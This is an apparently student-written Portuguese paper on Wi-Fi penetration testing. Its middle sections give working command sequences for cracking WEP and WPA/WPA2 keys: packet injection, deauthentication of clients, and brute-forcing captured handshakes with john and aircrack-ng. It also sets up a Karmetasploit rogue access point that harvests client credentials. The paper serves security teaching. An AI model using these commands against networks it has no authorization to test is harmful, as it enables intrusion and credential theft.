14
1 PEN-TEST COM ÊNFASE EM REDES WLAN Patrick Melo [email protected] Faculdade de Tecnologia de Teresina CET Teresina-PI-Brasil Abstract. Currently the wireless networks have remarkable growth both in the corporate environment and in captivity, but the safety issue is an aspect that deserves special attention, as a medium, but it is something that is not widespread. The identification and exploitation of the vulnerabilities of wireless networks (WLAN) are contained within the concept of penetration testing (Pen-Test), conceptually the PEN-TEST can also be defined as a set of techniques that we use to perform safety test. Holding PEN-TEST becomes an important mechanism to evaluate qualitatively and quantitatively even security problems that may be encountered. Must be used within a security planning methodology with well defined and concise. Resumo. Atualmente as redes sem fio têm notável crescimento tanto em meio corporativo quanto em meio doméstico, contudo o quesito segurança é um aspecto que merece uma atenção especial, dado determinado meio, porém é algo que não é amplamente difundido. A identificação e exploração das vulnerabilidades das redes sem-fio (WLAN) estão contidas no âmbito do conceito dos testes de penetração (Pen-Test), conceitualmente o PEN-TEST também pode ser definido como um conjunto de técnicas que podemos utilizar para realização de teste de segurança. A realização de PEN-TEST torna-se um mecanismo importante para avaliar de forma qualitativa e até mesmo quantitativa os problemas de segurança que venham a ser encontrados. Deve ser utilizado dentro de um planejamento de segurança bem definido e com metodologia concisa. Palavras-Chave: Redes, Wireless, Criptografia, Invasão, Internet, Pen-Test. 1. Introdução O surgimento do serviço sem fio começou no século XIX, onde “o pai do rádio” Guglielmo Marconi deu os primeiros passos fazendo testes em ondas de rádio, onde criou a primeira fábrica de rádio de todo o mundo, que se chamava Wireless Telegraph and Signal Company Limited. Já em 1901 aconteceu de receber sinais do outro lado do atlântico, e em 1905 foi utilizado o código morse. Alguns anos após, surgiu então a ALOHANET que foi a primeira rede de pacotes que usava rádio frequência no início dos anos 70, era uma rede baseada em um terminal central que distribuía as mensagens, que utilizava a topologia em estrela e fazia uso de CSMA. Com essa nova tecnologia, o IEEE (Institute of Electrical and Eletronics Engineers) constituiu um grupo de pesquisa para criar padrões abertos e tornar a

PEN-TEST - Avaliar a segurança de sistema e redes

  • Upload
    mamute

  • View
    24

  • Download
    1

Embed Size (px)

DESCRIPTION

Pen-test é um método que avalia a segurança de um sistema de computador oude uma rede, simulando um ataque de uma fonte maliciosa. O processo envolve umaanálise nas atividades do sistema, que envolvem a busca de alguma vulnerabilidade empotencial que possa ser resultado de uma má configuração do sistema, falhas emhardwares/softwares desconhecidas, deficiência no sistema operacional ou técnicascontra medidas. Todas as análises submetidas pelos testes escolhidos são apresentadasno sistema, junto com uma avaliação do seu impacto e muitas vezes com uma propostade resolução ou de uma solução técnica.

Citation preview

Page 1: PEN-TEST - Avaliar a segurança de sistema e redes

1

PEN-TEST COM ÊNFASE EM REDES WLAN

Patrick Melo

[email protected]

Faculdade de Tecnologia de Teresina – CET

Teresina-PI-Brasil

Abstract. Currently the wireless networks have remarkable growth both in the

corporate environment and in captivity, but the safety issue is an aspect that

deserves special attention, as a medium, but it is something that is not

widespread. The identification and exploitation of the vulnerabilities of

wireless networks (WLAN) are contained within the concept of penetration

testing (Pen-Test), conceptually the PEN-TEST can also be defined as a set of

techniques that we use to perform safety test. Holding PEN-TEST becomes an

important mechanism to evaluate qualitatively and quantitatively even security

problems that may be encountered. Must be used within a security planning

methodology with well defined and concise.

Resumo. Atualmente as redes sem fio têm notável crescimento tanto em meio

corporativo quanto em meio doméstico, contudo o quesito segurança é um

aspecto que merece uma atenção especial, dado determinado meio, porém é

algo que não é amplamente difundido. A identificação e exploração das

vulnerabilidades das redes sem-fio (WLAN) estão contidas no âmbito do

conceito dos testes de penetração (Pen-Test), conceitualmente o PEN-TEST

também pode ser definido como um conjunto de técnicas que podemos utilizar

para realização de teste de segurança. A realização de PEN-TEST torna-se

um mecanismo importante para avaliar de forma qualitativa e até mesmo

quantitativa os problemas de segurança que venham a ser encontrados. Deve

ser utilizado dentro de um planejamento de segurança bem definido e com

metodologia concisa.

Palavras-Chave: Redes, Wireless, Criptografia, Invasão, Internet, Pen-Test.

1. Introdução

O surgimento do serviço sem fio começou no século XIX, onde “o pai do rádio”

Guglielmo Marconi deu os primeiros passos fazendo testes em ondas de rádio, onde

criou a primeira fábrica de rádio de todo o mundo, que se chamava Wireless Telegraph

and Signal Company Limited. Já em 1901 aconteceu de receber sinais do outro lado do

atlântico, e em 1905 foi utilizado o código morse. Alguns anos após, surgiu então a

ALOHANET que foi a primeira rede de pacotes que usava rádio frequência no início dos

anos 70, era uma rede baseada em um terminal central que distribuía as mensagens, que

utilizava a topologia em estrela e fazia uso de CSMA.

Com essa nova tecnologia, o IEEE (Institute of Electrical and Eletronics

Engineers) constituiu um grupo de pesquisa para criar padrões abertos e tornar a

Page 2: PEN-TEST - Avaliar a segurança de sistema e redes

2

tecnologia sem fio cada vez mais presente. O projeto denominado de Padrão IEEE

802.11, nasceu em 1990, mas ficou inerte por aproximadamente sete anos devido a

fatores que não permitiam que a tecnologia sem fio saísse do papel. Um dos principais

fatores era a baixa taxa de transferência de dados que inicialmente a tecnologia oferecia,

que era entre 860Kbps à 2Mbps.

No decorrer do tempo a rede sem fio começou a ser vista como uma tecnologia

promissora e a receber ainda mais investimentos para a construção de equipamentos que

possibilitassem a comunicação sem fio entre computadores. Atualmente o foco das

redes de computadores sem fio (Wireless) se encontra no contexto das redes locais de

computadores (Wireless Local Area Network - WLAN), tanto em soluções proprietárias

como no padrão do IEEE. Primeiramente foram colocados em prática alguns padrões

proprietários, através de empresas como IBM, CISCO, Telecom e 3COM. Hoje essas e

outras empresas baseiam seus produtos no padrão do IEEE, devido às inúmeras e já

conhecidas vantagens que o padrão aberto oferece: interoperabilidade, baixo custo,

demanda de mercado, confiabilidade de projeto, entre outras. O padrão IEEE 802.11

define basicamente uma arquitetura para as WLANs que abrange os níveis: físico e

de enlace. No nível físico são tratadas apenas as transmissões com freqüência de rádio

(RF) e infravermelho (IR), embora outras formas de transmissão sem fio possam ser

usadas, como microondas e laser, por exemplo. No nível de enlace, o IEEE definiu um

protocolo de controle de acesso ao meio (protocolo MAC), bastante semelhante ao

protocolo usado em redes locais Ethernet (CSMA/CD).

2. Pen-Test

Quando se fala em segurança devem-se fazer algumas perguntas: Seguro contra o que?

Seguro contra quem? Seguro em que condições? Segurança pode ser definido como

dificultar ou impedir a ocorrência de eventos indesejáveis. A segurança da informação

consiste na proteção de um conjunto de dados a fim de preservar o valor que o mesmo

possui para um determinado indivíduo ou organização.

Entre diversos objetivos a segurança trata alguns princípios básicos que são:

Confidencialidade – Consiste em proteger a informação contra leitura e cópia

por alguém sem a devida autorização do proprietário da informação. Em redes de

computadores significa que no tráfego dos dados nenhuma informação poderá ser vista,

alterada ou capturada.

Autenticidade – Consiste na veracidade do emissor e receptor de informações

trocadas, geralmente implementada a partir de um mecanismo de senhas ou assinatura

digital.

Integridade - Consiste em proteger a informação contra modificação sem a

permissão explícita do proprietário daquela informação.

Disponibilidade - Consiste na proteção dos serviços prestados pelo sistema de

forma que eles não sejam degradados ou se tornem indisponíveis sem autorização,

assegurando ao usuário o acesso aos dados sempre que deles precisar.

Page 3: PEN-TEST - Avaliar a segurança de sistema e redes

3

Pen-test é um método que avalia a segurança de um sistema de computador ou

de uma rede, simulando um ataque de uma fonte maliciosa. O processo envolve uma

análise nas atividades do sistema, que envolvem a busca de alguma vulnerabilidade em

potencial que possa ser resultado de uma má configuração do sistema, falhas em

hardwares/softwares desconhecidas, deficiência no sistema operacional ou técnicas

contra medidas. Todas as análises submetidas pelos testes escolhidos são apresentadas

no sistema, junto com uma avaliação do seu impacto e muitas vezes com uma proposta

de resolução ou de uma solução técnica.

3. Quebrando Criptografia Wep

Neste artigo para quebra de criptografia WEP será utilizado o kismet, aireplay-ng e

aircrak-ng.

O Kismet é uma ferramenta passiva que trata a busca de informações e captura de

pacotes de uma determinada rede. Quando executada, sua interface de rede é

automaticamente inserida em modo promíscuo.

Usando o sistema operacional Ubuntu 9.10, o primeiro passo para se usar o

kismet é baixar o pacote e depois deve-se configurar o mesmo de acordo com o driver de

sua interface de rede, o arquivo de configuração é o “/etc/kismet/kismet.conf”.

Na linha “source=none,none,addme” altere para seguinte forma onde o primeiro

none é o driver usado pela sua placa de rede e segundo none é a sua interface e addme é

um apelido qualquer que pode-se dar a interface de rede.Quando o comando “kismet” é

executado em um terminal, você terá acesso a seguinte interface.

Figura 1. Visualização das redes

#apt-get install kismet

Page 4: PEN-TEST - Avaliar a segurança de sistema e redes

4

Pressione a tecla “backspace” e em seguida a tecla “s” e depois “b”, e selecione a

rede “alvo”, para obter informações sobre a rede “alvo” pressione a tecla “enter”.

Figura 2. Informações da rede alvo

Para efetuar a captura de pacotes devemos selecionar a rede “alvo” e ativar a

tecla “caps lock” e em seguida digitar “shift+l” para que o KISMET comece a captura.

Figura 3. Captura de pacotes

Page 5: PEN-TEST - Avaliar a segurança de sistema e redes

5

Agora para injetar tráfego na rede deve-se colocar a interface em modo

promíscuo no canal da rede alvo, onde wlan2 refere-se a interface de rede e 5 o canal

utilizado pela rede alvo, para isso utilizamos o seguinte comando:

Utilize a ferramenta aireplay-ng para a injeção de tráfego na rede. O aireplay-ng

faz parte da suíte aircrack-ng. Para injetar tráfego na rede “alvo” é necessário obter

informações como o BSSID do AP alvo e endereço físico de sua interface de rede,

obtendo essa informação é só executar o seguinte comando em outro terminal:

Onde 00:02:6F:61:DE:0B é o BSSID e o 00-1F-1F-13-0E-52 é o endereço físico

de sua interface de rede ou de algum cliente conectado.

Figura 4. Injeção de tráfego na rede

Os pacotes capturados pelo kismet se encontram no diretório “/var/log/kismet/”,

onde o arquivo utilizado para a descriptografar é o arquivo “Kismet-data-do-

teste.dump”.

#aireplay-ng -3 -b 00:02:6F:61:DE:0B -h 00-1F-1F-13-0E-52 wlan2

#airmon-ng start wlan2 5

#apt-get install aircrack-ng

Page 6: PEN-TEST - Avaliar a segurança de sistema e redes

6

Para a descriptografia utilize o aircrack-ng, Com outro terminal entre no

diretório onde se encontram os pacotes capturados, em seguida execute a ferramenta

selecionando a rede alvo.

Figura 5. Selecionando a rede alvo

Em seguida será iniciado processo de descriptografia.

Figura 6. Descriptografando

#cd /var/log/kismet

#aircrack-ng <nome_do_arquivo.dump>

Page 7: PEN-TEST - Avaliar a segurança de sistema e redes

7

4. Quebrando Criptografia WPA/WPA2

Na criptografia wpa, serão necessárias mais algumas ferramentas, contudo capture o

handshake e use-o para a descriptografia juntamente com ferramentas de força bruta ou

wordlists.

Para dar inicio a quebra da criptografia, utilize novamente o kismet, pelo

terminal, e identifique todas as informações precisas da rede, tais como SSID, BSSID,

tipo de chave, canal utilizado dentre outras.

Figura 7. Informações da rede alvo

Page 8: PEN-TEST - Avaliar a segurança de sistema e redes

8

Para visualizar os clientes que se encontram conectados à rede, pressione a tecla

“c”.

Figura 8. Clientes da rede alvo

Após a visualização dos clientes conectados, selecione um endereço mac de um

cliente conectado para forçar a desautenticação seguida da captura dos handshakes, com

os comandos a seguir:

Usando ataque de força bruta:

#airmon-ng start <interface de rede> <canal>

#airodump-ng -w <nome do arquivo> -c <canal> <interface>

#aireplay-ng -0 1 -a <MAC DO AP> -c <MAC DO CLIENTE> <interface de rede>

#john -incremental=digits --stdout | aircrack-ng -b <MAC DO ACCESS POINT> -w -

<NOME DO ARQUIVO.cap>

Page 9: PEN-TEST - Avaliar a segurança de sistema e redes

9

Figura 9. Resultado do ataque de força bruta

Usando Wordlist e mesclando com o john:

Figura 10. Resultado do ataque usando wordlist

Existem também outros tipos de ferramentas de ataque customizado que exigem

um pouco mais de conhecimento do atacante.

Neste caso será usada a distribuição Back track v4 que contém a suíte de

ferramentas Metasploit Framework, que conta com mais de 500 exploits para

exploração de vulnerabilidades, onde a escolhida foi o “Karma” que é um conjunto de

#john --stdout --incremental:all | aircrack-ng -b <MAC DO ACCESS POINT> -w -

<NOME DO ARQUIVO*.cap>

Page 10: PEN-TEST - Avaliar a segurança de sistema e redes

10

ferramentas para avaliar a segurança de clientes das redes sem fio em várias camadas, e

pode-se capturar credenciais ou explorar vulnerabilidades do lado do cliente no host.

Pré-Requisitos:

Você precisa ter a suíte aircrack-ng instalada, consulte http://www.aircrack-

ng.org/doku.php?id=install_aircrack

Karmetasploit requer um banco de dados back-end para estar no lugar antes que

ele possa ser usado, isso pode ser conseguido através da execução:

Figura 11. Instalação

Configuração Inicial:

A primeira coisa que precisamos é configurar um servidor dhcp, em

“/etc/dhcpd/dhcpd.conf”,

# gem install sqlite3-ruby activerecord

Page 11: PEN-TEST - Avaliar a segurança de sistema e redes

11

Figura 12. Configuração DHCP

Após a configuração do servidor dhcp devemos iniciar o serviço através do

comando a seguir:

Em seguida, atualize o banco de exploits do Metasploit, para isso entre no

diretório /pentest/exploits/framework3.

Agora crie uma nova interface de modo monitor virtual:

Obs: Isso irá criar um modo de interface mon0 monitor, use iwconfig para confirmar.

Agora crie o novo ponto de acesso:

# /etc/init.d/dhcp3-server start

# cd / pentest/exploits/framework3

# svn update

# airmon-ng start wlan0

# airbase-ng –c 11 –P -C 30 --essid "linksys"-v mon0

Page 12: PEN-TEST - Avaliar a segurança de sistema e redes

12

Figura 13. Criando um ponto de acesso

- c = canal

- P = responda a todas as sondas e cria falsos SSID’S

- C 30 = permitir balizamento de valores sondados ESSID (em segundos)

-- essid = especificar um único ESSID

mon0 = interface de modo monitor virtual

Adicione um ip a uma interface virtual através do comando:

Edite o arquivo dhcp3-server que se encontra no diretório abaixo para que a

distribuição dos ips seja apenas pela interface at0

INTERFACES="at0"

Logo após entre no diretório “/pentest/exploits/framework3” para atualizar o

banco do metasploit e rode o karmetasploit.

# ifconfig at0 10.0.0.1 netmask 255.255.255.0 up

# vim /etc/default/dhcp3-server

Page 13: PEN-TEST - Avaliar a segurança de sistema e redes

13

Figura 14. Usando o Metasploit

5. Técnicas utilizadas

Network Scanning (varreduras);

Vulnerability Scanning (análises de vulnerabilidades);

Password Cracking (bruteforce);

Log Review (análise de logs);

Mitm Test (análise a partir da LAN);

War Driving (teste em sistema Wireless LAN);

Warchalking (teste em sistema Wireless LAN);

# . /msfconsole –r karma.rc

#svn update

Page 14: PEN-TEST - Avaliar a segurança de sistema e redes

14

6. Técnicas Intrusivas

Exploração de vulnerabilidades conhecidas nos serviços identificados;

Exploração de Vulnerabilidades em aplicações Web;

Técnicas de Bruteforce para serviços e Cracking de Senhas;

Testes de Negação de Serviço (DOS);

Escalada de Privilégios;

7. Conclusão

Em geral, é comum encontrar redes sem fio desprovidas de segurança e passíveis de

serem facilmente invadidas, comprometendo assim toda a rede, onde atualmente toda a

informação digital tem um valor imensurável para o meio coorporativo, sendo que ter

seus dados capturados por um atacante é algo que pode gerar danos irreparáveis e fazer

um pen-test é algo a ser considerado para identificar as possíveis vulnerabilidades da

rede e as possibilidades de invasão. As redes sem fio são muito atraentes devido a sua

facilidade e comodidade, todavia o quesito segurança deve estar em primeiro lugar.

8. Referências

How Wi-Fi Works. Disponível em <http://computer.howstuffworks.com/wireless-

network.htm>. Acessado em 30.04.2010.

Novas Tecnologias de Redes. Disponível em

<http://www.guiadohardware.net/tutoriais/061/>. Acessado em 10.04.2010.

Entendendo (e quebrando) a Segurança em Redes Wireless. Disponível em

<http://www.guiadohardware.net/tutoriais/121/>. Acessado em 16.04.2010.

Plano de Atribuição, Destinação e Distribuição de Faixas de Freqüências no Brasil.

Disponível em

<http://www.anatel.gov.br/Tools/frame.asp?link=/biblioteca/planos/plano_atribuicao_2

006.pdf>. Acessado em 15.04.2010.

<http://www.ieee.org> Acessado em 11.04.2010

Guerrini, I. M., Luz: Fundamentos teóricos. Disponível

em<http://educar.sc.usp.br/otica/luz.htm>. Acessado em 08.05.2010.

<http://www.dec.ufcg.edu.br>. Acessado em 15.05.2010